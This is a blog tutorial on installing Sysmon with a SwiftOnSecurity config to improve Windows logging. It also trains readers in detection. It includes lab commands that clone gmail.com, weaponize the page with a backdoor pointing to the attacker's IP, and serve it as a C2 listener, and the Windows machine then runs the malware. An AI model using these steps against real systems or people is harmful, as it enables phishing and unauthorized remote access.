Getting Started With Sysmon
John Strand //
In this blog, I want to walk through how we can set up Sysmon to easily get improved logging over what we get from normal (and just plain awful) logging in Windows.
Basically, trying to get information from standard Windows logs is a lot like playing tennis against curtains. Sure, you can go through the right motions, and you can try really hard, but no matter what, it is going to suck.
For this blog, we will be using ADHD which you can get here:
I hope that by the time you do this, I will have updated it to the version I used at Black Hat 2019.
First, let’s start up the ADHD Linux system and set up our malware and C2 listener:
On your Linux system, please run the following command:
Please note the IP address of your Ethernet adapter.
Please note that my adaptor is called ens33 and my IP address is 192.168.123.128. Your IP Address and adapter name may be different.
Please note your IP address for the ADHD Linux system below:
Now, run the following commands to start a simple backdoor and backdoor listener:
$ sudo su - # cd /opt/java-web-attack/ # ./clone.sh https://gmail.com # ./weaponize.py index.html 192.168.123.128 <<<--- Your IP will be different!!!! # ./serve.sh
Next, move back to your Windows system log in as admin.
We will now need to open a cmd.exe terminal as Administrator. Remember, hit the Windows key, type cmd.exe, right-click on it, and then select Run As Administrator.
Please take a few moments and download Sysmon from here:
Then, extract it to a C:\Tools directory.
And, download Swift on Security’s sysmon config to the tools directory.
You can find it here:
I recommend downloading it as a zip and extracting it to the Tools directory.
Then, type the following:
C:\Tools>Sysmon64.exe -accepteula -i sysmonconfig-export.xml
System Monitor v10.2 - System activity monitor Copyright (C) 2014-2019 Mark Russinovich and Thomas Garnier Sysinternals - www.sysinternals.com
Loading configuration file with schema version 4.00 Sysmon schema version: 4.21 Configuration file validated. Sysmon64 installed. SysmonDrv installed. Starting SysmonDrv. SysmonDrv started. Starting Sysmon64.. Sysmon64 started.
Now, let’s download and execute the malware.
Next, surf to your Linux system, download the malware and try to run it again.
Now, we need to view the Sysmon events for this malware:
You will select Event Viewer > Applications and Services Logs > Windows > Sysmon > Operational
Start at the top and work down through the logs. You should see your malware executing.
As you can see above, the level of detail in the logs is fantastic. It gives us the process, the IP addresses, who ran it, and the hash values. Everything you always wanted, all for free… From Microsoft.
Looking to implement this via Group Policy in Active Directory? Want to throw the logs to ELK?
Check out the following video:
Want to level up your skills and learn more straight from John himself?
You can check out his classes below!
Active Defense & Cyber Deception
Getting Started in Security with BHIS and MITRE ATT&CK
Available live/virtual and on-demand